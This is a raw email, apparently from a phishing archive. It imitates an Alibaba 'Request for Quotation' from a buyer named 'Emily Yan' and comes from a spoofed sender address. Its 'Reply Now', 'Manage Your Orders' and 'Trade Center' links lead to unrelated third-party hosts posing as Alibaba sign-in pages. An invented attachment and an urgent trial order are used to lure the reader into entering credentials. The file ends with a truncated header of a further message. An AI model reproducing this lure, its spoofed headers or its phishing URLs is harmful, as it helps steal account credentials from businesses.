From: "feedback@service.alibaba.com" <prime@sujatashah.nazwa.pl>
Date: Mon, 12 Feb 2018 00:49:20 +0100
X-Antivirus: Avast (VPS 180211-0, 2018-02-11), Outbound message
X-Antivirus-Status: Clean
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 419

You will not see this in a MIME-aware mail reader.
--===============1786936717==
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

 
    
    
    <IMG class=3DCToWUd alt=3Dhttps://img.alicdn.com/tps/TB1UWe7OVXXXXbLaFX=
XXXXXXXXX-100- 72.png src=3D"https://ci4.googleusercontent.com/proxy/ZljqKp=
QuJKbKw1zbqgmFa7pS_OdINyQ_rFBGGo9s8t_LiskUsDVouePy8mC3AjYgJXDql5LSYSHw- t6Y=
7IrmP96csxFIO42NUJig2AxQXo5xh0PKij5s=3Ds0-d-e1-ft#https://img.alicdn.com/tp=
s/TB1UWe7OVXXXXbLaFXXXXXXXXXX-100-72.png" width=3D78 height=3D49> Request f=
or Quotation                 ;  Trade Center	  
  
   
    
    
   	   Emily Yan Import Manager    4-Year Gold Customer [verified] Greece
	 
    Emily Yan From Greece has sent you an inquiry  

   
   Reply Now	  	 Manage Your Orders
 Dear jose@monkey.org
 Hope this mails find you well.

Your product will do well in our market so we will like to make you our mai=
n supplier.
Please I will need your Whatsapp or Sykpe ID for faster communication.
 We want to make an urgent trial order, attached is all we need.
 Please what is your earliest delivery time for this order.
 

 
 

 
Regards,
Emily Yan
 Import Manager
 Marfin Investment Group 
 +30 210 15 07 000
  
 You received this email because you are registered on Alibaba.com with jos=
e@monkey.org
  
  
   	 It contains an attachment. Please sign into Trade Center to check it.

  
 




---
Ta wiadomo=C5=9B=C4=87 zosta=C5=82a sprawdzona na obecno=C5=9B=C4=87 wirus=
=C3=B3w przez oprogramowanie antywirusowe Avast.
https://www.avast.com/antivirus

--===============1786936717==
Content-Type: text/html; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Dutf-8"/></head><BODY><P>
<TABLE style=3D"HEIGHT: 754px; WIDTH: 641px" cellSpacing=3D0 cellPadding=3D=
0 width=3D641 bgColor=3D#efefef border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; PADDING-BOTTOM: 30px; PADDING-=
TOP: 30px; MARGIN: 0px" align=3Dcenter>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D556 border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D555 align=3Dleft border=3D0>=

<TBODY>
<TR>
<TD style=3D"FONT-SIZE: 15px; FONT-FAMILY: Arial, Helvetica, sans-serif; CO=
LOR: rgb(84,84,84); PADDING-TOP: 4px; MARGIN: 

0px; LINE-HEIGHT: 16px" width=3D552>&nbsp;<IMG class=3DCToWUd alt=3Dhttps:/=
/img.alicdn.com/tps/TB1UWe7OVXXXXbLaFXXXXXXXXXX-100-

72.png 

src=3D"https://ci4.googleusercontent.com/proxy/ZljqKpQuJKbKw1zbqgmFa7pS_OdI=
NyQ_rFBGGo9s8t_LiskUsDVouePy8mC3AjYgJXDql5LSYSHw-

t6Y7IrmP96csxFIO42NUJig2AxQXo5xh0PKij5s=3Ds0-d-e1-ft#https://img.alicdn.com=
/tps/TB1UWe7OVXXXXbLaFXXXXXXXXXX-100-72.png" 

width=3D78 height=3D49><FONT color=3D#9a9a9a size=3D5><SPAN>&nbsp;</SPAN></=
FONT><FONT color=3D#000000 size=3D5>Request for 

Quotation</FONT><FONT color=3D#9a9a9a 

size=3D5><SPAN>&nbsp;</SPAN></FONT>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp

;&nbsp;<SPAN>&nbsp;</SPAN><B><FONT size=3D4>Trade Center</FONT></B></TD>
<TD style=3D"FONT-SIZE: 11px; FONT-FAMILY: Arial, Helvetica, sans-serif; CO=
LOR: rgb(85,85,85); MARGIN: 0px" vAlign=3Dbottom 

width=3D3 align=3Dright>&nbsp;</TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" height=3D5></TD><=
/TR>
<TR>
<TD style=3D"BORDER-TOP: rgb(181,221,255) 1px solid; FONT-FAMILY: arial, sa=
ns-serif; BORDER-RIGHT: rgb(181,221,255) 1px 

solid; BORDER-LEFT: rgb(181,221,255) 1px solid; MARGIN: 0px">
<TABLE style=3D"HEIGHT: 179px; WIDTH: 573px" cellSpacing=3D0 cellPadding=3D=
0 width=3D573>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px">
<TABLE cellSpacing=3D0 cellPadding=3D0>
<TBODY>
<TR>
<TD style=3D"COLOR: rgb(54,152,201); PADDING-BOTTOM: 0px; PADDING-TOP: 0px;=
 FONT: bold 22px arial; PADDING-LEFT: 80px; 

MARGIN: 0px; PADDING-RIGHT: 0px; font-stretch: normal" align=3Dcenter>
<TABLE style=3D"FONT-SIZE: 12px; FONT-FAMILY: Arial, Helvetica, sans-serif;=
 BORDER-COLLAPSE: collapse; BORDER-SPACING: 0px" 

width=3D389>
<TBODY>
<TR>
<TD style=3D"FONT-SIZE: 12px; FONT-FAMILY: Arial, Helvetica, sans-serif; PA=
DDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-

LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px" width=3D62><IMG class=3DCToWUd =
style=3D"BORDER-TOP: rgb(204,204,204) 1px solid; 

HEIGHT: 108px; BORDER-RIGHT: rgb(204,204,204) 1px solid; WIDTH: 106px; BORD=
ER-BOTTOM: rgb(204,204,204) 1px solid; BORDER-

LEFT: rgb(204,204,204) 1px solid" src=3D"http://3.bp.blogspot.com/_UD1TRPOs=
sR0/SfLlTX_VZ7I/AAAAAAAAAoM/gkxOfegaDDU/w1200-

h630-p-k-no-nu/zhangziyi1.jpg" width=3D70 height=3D70></TD>
<TD style=3D"FONT-SIZE: 12px; FONT-FAMILY: Arial, Helvetica, sans-serif; PA=
DDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-

LEFT: 0px; MARGIN: 0px; LINE-HEIGHT: 18px; PADDING-RIGHT: 0px">
<DIV><FONT face=3DCalibri><FONT color=3D#0000ff><B>&nbsp;Emily Yan</B></FON=
T></FONT></DIV><FONT face=3DCalibri></FONT>
<DIV><FONT face=3DCalibri><B>Import Manager&nbsp;</B></FONT>&nbsp;<SPAN>&nb=
sp;</SPAN><A title=3D"Gold Supplier" style=3D"FONT-

SIZE: 11px; TEXT-DECORATION: none; COLOR: black" href=3D"http://style.aliba=
ba.com/hermes/goldsuppliers.html" rel=3D"noopener 

noreferrer" target=3D_blank data-saferedirecturl=3D"https://www.google.com/=
url?

hl=3Den&amp;q=3Dhttp://style.alibaba.com/hermes/goldsuppliers.html&amp;sour=
ce=3Dgmail&amp;ust=3D1510624109402000&amp;usg=3DAFQjCNEpJ

SQhpVXrKZwv0eYQQvFOEwhdkg" data-saferedirectreason=3D"1"><IMG class=3DCToWU=
d border=3D0 

src=3D"https://ci5.googleusercontent.com/proxy/FghOtmjOSurV9l27F-

0xGnlCKn1sBsX9WiPisYZdBHBO7NbfXaESGoBsyiwLsvuLaWuf0zMeRXnlBvzH7Oi-Cg3uTqWyu=
UPOfbIohN3v42T-0R5b4l5hZMg5INV5aJL0-mI=3Ds0-d-e1

-ft#http://i02.i.aliimg.com/images/eng/style/icon/refine_icon_gold_supplier=
s.gif" align=3DabsMiddle><FONT style=3D"FONT-SIZE: 

9pt; FONT-WEIGHT: 700" face=3DCalibri><SPAN>&nbsp;</SPAN></FONT></A><FONT s=
tyle=3D"FONT-SIZE: 9pt" face=3DCalibri><SPAN 

style=3D"FONT-WEIGHT: 700; FONT-STYLE: normal; font-variant-ligatures: norm=
al; font-variant-caps: normal">4-Year Gold 

Customer [<FONT color=3D#ff6600>verified</FONT>]</SPAN></FONT><SPAN style=
=3D"FONT: 9px arial; font-stretch: 

normal"></SPAN></DIV>
<DIV><B><FONT face=3DCalibri>Greece</FONT></B></DIV></TD></TR></TBODY></TAB=
LE></TD>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px"><IMG class=3DCToW=
Ud 

src=3D"https://ci6.googleusercontent.com/proxy/vQYNdhg_MB4zEGG_SFXJh_Rlr8tR=
MJY0UWaJ2zXjHaNHSgbcfBsCFegv4ZxJeWC3MtKSBwar7MZwu

AYGoGvH6jLgzd1Q0ioFQVJIo22uPUt0Vr0Xlh9ZgYypAw=3Ds0-d-e1-

ft#http://img.alibaba.com/images/cms/upload/trade_alert/ta_new2_logo.gif" w=
idth=3D85 height=3D85></TD></TR></TBODY></TABLE>
<P style=3D"MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px"><FONT style=3D"FONT-SIZE: =
20pt" face=3DCalibri>&nbsp;&nbsp; Emily 

Yan&nbsp;From&nbsp;Greece has sent you an inquiry<SPAN>&nbsp;</SPAN></FONT>=
<FONT style=3D"FONT-SIZE: 

20pt">&nbsp;</FONT></P></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD style=3D"FONT-SIZE: 13px; FONT-FAMILY: Arial, Helvetica, sans-serif; BO=
RDER-RIGHT: rgb(181,221,255) 1px solid; PADDING-

BOTTOM: 50px; PADDING-TOP: 20px; PADDING-LEFT: 20px; BORDER-LEFT: rgb(181,2=
21,255) 1px solid; MARGIN: 0px; PADDING-RIGHT: 

20px" width=3D514>
<TABLE cellSpacing=3D0 cellPadding=3D0 width=3D"100%" border=3D0>
<TBODY>
<TR width=3D"100%">
<TD style=3D"BORDER-TOP: rgb(255,117,26) 1px solid; HEIGHT: 42px; FONT-FAMI=
LY: arial, sans-serif; BORDER-RIGHT: rgb

(255,117,26) 1px solid; WIDTH: 290px; BORDER-BOTTOM: rgb(255,117,26) 1px so=
lid; TEXT-ALIGN: center; BORDER-LEFT: rgb

(255,117,26) 1px solid; MARGIN: 0px; BACKGROUND-COLOR: rgb(255,117,26); bor=
der-radius: 3px"><A style=3D"FONT-SIZE: 18px; 

TEXT-DECORATION: none; FONT-FAMILY: Arial, Helvetica, sans-serif; COLOR: rg=
b(255,255,255); PADDING-BOTTOM: 0px; PADDING-

TOP: 0px; PADDING-LEFT: 30px; LINE-HEIGHT: 40px; PADDING-RIGHT: 30px; borde=
r-radius: 3px" 

href=3D"https://p11.secure.hostingprod.com/@site.teamuniform.com/ssl/cli.al=
ibaba/indexx.php" rel=3D"noopener noreferrer" 

target=3D_blank data-saferedirecturl=3D"https://www.google.com/url?

hl=3Den&amp;q=3Dhttps://www.globaltank.es/new/app/class/www.Alibaba.com/vqc=
r8bp0gud%26lc%3D1033%26id%3D64855%26mkt%3Den-us

%26cbcxt%3Dmai%26snsc.php?email26.rand%3D13vqcr8bp0gud%26lc%3D1033%26id%3D6=
4855%26mkt%3Den-us%26cbcxt%3Dmai%26snsc

%3D1&amp;source=3Dgmail&amp;ust=3D1510624109402000&amp;usg=3DAFQjCNHG69OQ0P=
cLHX2CPt5MoxmCXNvamg" data-

saferedirectreason=3D"2">Reply Now</A></TD>
<TD style=3D"HEIGHT: 44px; FONT-FAMILY: arial, sans-serif; WIDTH: 49px; MAR=
GIN: 0px">&nbsp;</TD>
<TD style=3D"BORDER-TOP: rgb(200,210,224) 1px solid; HEIGHT: 42px; FONT-FAM=
ILY: arial, sans-serif; BORDER-RIGHT: rgb

(200,210,224) 1px solid; WIDTH: 290px; BORDER-BOTTOM: rgb(200,210,224) 1px =
solid; TEXT-ALIGN: center; BORDER-LEFT: rgb

(200,210,224) 1px solid; MARGIN: 0px; BACKGROUND-COLOR: rgb(255,255,255); b=
order-radius: 3px"><A style=3D"FONT-SIZE: 18px; 

TEXT-DECORATION: none; FONT-FAMILY: Arial, Helvetica, sans-serif; COLOR: rg=
b(51,51,51); PADDING-BOTTOM: 0px; PADDING-TOP: 

0px; PADDING-LEFT: 30px; LINE-HEIGHT: 40px; PADDING-RIGHT: 30px; border-rad=
ius: 3px" 

href=3D"https://p11.secure.hostingprod.com/@site.teamuniform.com/ssl/cli.al=
ibaba/indexx.php" rel=3D"noopener noreferrer" 

target=3D_blank data-saferedirecturl=3D"https://www.google.com/url?

hl=3Den&amp;q=3Dhttps://www.globaltank.es/new/app/class/www.Alibaba.com/vqc=
r8bp0gud%26lc%3D1033%26id%3D64855%26mkt%3Den-us

%26cbcxt%3Dmai%26snsc.php?email26.rand%3D13vqcr8bp0gud%26lc%3D1033%26id%3D6=
4855%26mkt%3Den-us%26cbcxt%3Dmai%26snsc

%3D1&amp;source=3Dgmail&amp;ust=3D1510624109403000&amp;usg=3DAFQjCNHO9PfNzx=
UkTP67PiHDt0WxOLiYsQ" data-

saferedirectreason=3D"2">Manage Your Orders</A></TD></TR></TBODY></TABLE>
<P style=3D"MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px"><FONT size=3D3 face=3DCali=
bri><SPAN>Dear&nbsp;</SPAN></FONT><FONT style=3D"FONT-

WEIGHT: 700" color=3D#ff751a size=3D3 face=3DCalibri><A style=3D"COLOR: rgb=
(17,85,204)" target=3D_blank>jose@monkey.org</A></FONT></P>
<P style=3D"MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px"><FONT size=3D3 face=3DCali=
bri>Hope this mails find you well.<BR><BR>Your 

product will do well in our market so we will like to make you our main sup=
plier.<br>Please I will need your Whatsapp or 

Sykpe ID for faster communication.</FONT></P>
<P style=3D"MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px"><FONT size=3D3 face=3DCali=
bri>We want to make an urgent trial order, attached 

is all we need.<BR> Please what is your earliest delivery time for this ord=
er.<BR>&nbsp;<BR><BR>&nbsp;<BR> 

<BR></FONT></P><FONT size=3D3 face=3DCalibri></FONT><FONT size=3D3 face=3DC=
alibri>
<P style=3D"MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px"><BR>Regards,<BR>Emily Yan<=
/P>
<P style=3D"MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px"><STRONG>Import Manager</ST=
RONG></P>
<P style=3D"MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px"><STRONG>Marfin Investment =
Group</STRONG>&nbsp;</FONT></P>
<P style=3D"MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px"><FONT size=3D3 face=3DCali=
bri>+30 210 15 07 000</FONT></P>
<P style=3D"MARGIN-BOTTOM: 0px; MARGIN-TOP: 0px"><FONT size=3D3 face=3DCali=
bri></FONT>&nbsp;</P>
<P style=3D"WORD-WRAP: break-word; WORD-BREAK: break-all; PADDING-BOTTOM: 0=
px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 

0px; LINE-HEIGHT: 18px; PADDING-RIGHT: 0px"><FONT style=3D"FONT-SIZE: 9pt" =
face=3DCalibri>You received this email because you 

are registered on Alibaba.com with<SPAN>&nbsp;</SPAN><B><FONT color=3D#ff75=
19><A style=3D"COLOR: rgb(17,85,204)" 

target=3D_blank>jose@monkey.org</A></FONT></B></FONT></P>
<P style=3D"WORD-WRAP: break-word; WORD-BREAK: break-all; PADDING-BOTTOM: 0=
px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 

0px; LINE-HEIGHT: 18px; PADDING-RIGHT: 0px"><STRONG><FONT color=3D#ff7519 f=
ace=3DCalibri></FONT></STRONG>&nbsp;</P>
<P style=3D"WORD-WRAP: break-word; WORD-BREAK: break-all; PADDING-BOTTOM: 0=
px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 

0px; LINE-HEIGHT: 18px; PADDING-RIGHT: 0px">
<TABLE style=3D"FONT-SIZE: 14px; FONT-FAMILY: verdana, Tahoma, Arial, ??, s=
ans-serif; WHITE-SPACE: normal; WORD-SPACING: 

0px; TEXT-TRANSFORM: none; FONT-WEIGHT: 400; COLOR: rgb(51,51,51); FONT-STY=
LE: normal; ORPHANS: 2; WIDOWS: 2; LETTER-

SPACING: normal; TEXT-INDENT: 0px; font-variant-ligatures: normal; font-var=
iant-caps: normal; -webkit-text-stroke-width: 

0px; text-decoration-style: initial; text-decoration-color: initial" cellSp=
acing=3D0 cellPadding=3D0 width=3D"100%" 

bgColor=3D#f5f7fa border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-SIZE: 14px; FONT-FAMILY: Arial, Helvetica, sans-serif; CO=
LOR: rgb(51,51,51); PADDING-BOTTOM: 0px; 

PADDING-TOP: 10px; PADDING-LEFT: 20px; LINE-HEIGHT: 18px; PADDING-RIGHT: 0p=
x" align=3Dleft><IMG border=3D0 

src=3D"http://style.alibaba.com/simg/sprites/env/gangesweb/onepage/list/att=
ach.png"></TD>
<TD style=3D"FONT-SIZE: 14px; FONT-FAMILY: Arial, Helvetica, sans-serif; CO=
LOR: rgb(51,51,51); PADDING-BOTTOM: 10px; 

PADDING-TOP: 10px; PADDING-LEFT: 0px; LINE-HEIGHT: 18px; PADDING-RIGHT: 20p=
x" align=3Dleft>It contains an attachment. Please 

sign into<SPAN>&nbsp;</SPAN><A style=3D"FONT-SIZE: 14px; TEXT-DECORATION: n=
one; FONT-FAMILY: Arial, Helvetica, sans-serif; 

COLOR: rgb(22,134,204); LINE-HEIGHT: 18px" 

href=3D"https://p11.secure.hostingprod.com/@site.teamuniform.com/ssl/cli.al=
ibaba/indexx.php" target=3D_blank>Trade 

Center<SPAN>&nbsp;</SPAN></A>to check it.</TD></TR></TBODY></TABLE></P>
<P style=3D"WORD-WRAP: break-word; WORD-BREAK: break-all; PADDING-BOTTOM: 0=
px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 

0px; LINE-HEIGHT: 18px; PADDING-RIGHT: 0px">&nbsp;</P>
<P style=3D"WORD-WRAP: break-word; WORD-BREAK: break-all; PADDING-BOTTOM: 0=
px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 

0px; LINE-HEIGHT: 18px; PADDING-RIGHT: 0px"><FONT face=3DCalibri><IMG class=
=3DCToWUd style=3D"BORDER-LEFT-WIDTH: 0px; BORDER-

RIGHT-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-TOP-WIDTH: 0px" border=
=3D0 

src=3D"https://ci5.googleusercontent.com/proxy/9R7_UaLbDme1OCgYn8XPuGPWza17=
IQ70T2c8jWU_H_y2nZDmIGbuF9rzwu-

lD4kuowdw1OnT3qdv1cT7Qjx1fVV6AEQMZ4hSFi20rrVmVcCrpkp1TCVLFVaw8A=3Ds0-d-e1-

ft#http://gtms03.alicdn.com/tps/i3/TB1rFbZGXXXXXb4XpXXezUPJpXX-90-90.jpg" w=
idth=3D90 

height=3D90></FONT></P></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>=
</P><div id=3D"DAB4FAD8-2DD7-40BB-A1B8-4E2AA1F9FDF2">
<br /><br />
<hr style=3D'border:none; color:#909090; background-color:#B0B0B0; height: =
1px; width: 99%;' />
<table style=3D'border-collapse:collapse;border:none;'>
	<tr>
		<td style=3D'border:none;padding:0px 15px 0px 8px'>
			<a href=3D"https://www.avast.com/sig-email?utm_medium=3Demail&utm_source=
=3Dlink&utm_campaign=3Dsig-email&utm_content=3Demailclient">
				<img border=3D0 src=3D"http://static.avast.com/emails/avast-mail-stamp.=
png" alt=3D"Avast logo" />
			</a>
		</td>
		<td>
			<p style=3D'color:#3d4d5a; font-family:"Calibri","Verdana","Arial","Helv=
etica"; font-size:12pt;'>
				Ta wiadomo=C5=9B=C4=87 zosta=C5=82a sprawdzona na obecno=C5=9B=C4=87 wi=
rus=C3=B3w przez oprogramowanie antywirusowe Avast.
				<br><a href=3D"https://www.avast.com/sig-email?utm_medium=3Demail&utm_s=
ource=3Dlink&utm_campaign=3Dsig-email&utm_content=3Demailclient">www.avast.=
com</a>
			</p>
		</td>
	</tr>
</table>
<br />
<a href=3D"#DAB4FAD8-2DD7-40BB-A1B8-4E2AA1F9FDF2" width=3D"1" height=3D"1">=
 </a></div></BODY></HTML>
--===============1786936717==--

From jose@monkey.org Mon Feb 12 14:10:21 2018 +0000
Return-Path: maudygroup@host.jamkrida-online.co.id
Delivered-To: jose@monkey.org
X-FDA: 73832635842.27.8029108
Received: from filter.hostedemail.com (10.5.16.248.rfc1918.com [10.5.16.248])
	by smtpin27.b.hostedemail.com (Postfix) with ESMTP id DCB4511C5F
	for <jose@monkey.org>; Mon, 12 Feb 2018 14:10:20 +0000 (UTC)
X-Spam-Summary: 73,5,0,056d650144f0db82,d41d8cd98f00b204,maudygroup@host.jamkrida-online.co.id,:,RULES_HIT:41:46:150:153:355:375:379:543:967:973:979:983:988:989:1208:1216:1224:1260:1263:1311:1313:1314:1345:1381:1431:1437:1513:1515:1516:1517:1521:1534:1538:1559:1593:1594:1676:1699:1711:1714:1730:1747:1777:1792:1801:2393:2525:2549:2560:2563:2682:2685:2859:2890:2915:2933:2937:2939:2942:2945:2947:2951:2954:3022:3138:3139:3140:3141:3142:3586:3865:3866:3867:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4383:4388:4395:4605:5007:6261:6678:8583:8599:8603:8987:9025:9037:10004:10400:11658:11914:12043:12114:13139:13311:13357:13439:13868:14036:14181:14384:14721:14764:18000:21067:21080:21324:21450:21451:21627,0,RBL:45.64.98.93:@host.jamkrida-online.co.id:.lbl8.mailshell.net-62.8.113.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:34,LUA_SUMMARY:none
X-HE-Tag: wire43_59f41e4990941
X-Filterd-Recvd-Size: 1979
Received: from host.jamkrida-online.co.id (jamkrida-online.co.id [45.64.98.93])
	by imf02.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon, 12 Feb 2018 14:10:18 +0000 (UTC)
Received: from maudygroup by host.jamkrida-online.co.id with local (Exim 4.89_1)
	(envelope-from <maudygroup@host.jamkrida-online.co.id>)
	id 1elEo9-00076Q-Ob
	for jose@monkey.org; Mon, 12 Feb 2018 21:10:13 +0700
Date: Mon, 12 Feb 2018 14:10:13 +0000
To: jose@monkey.org
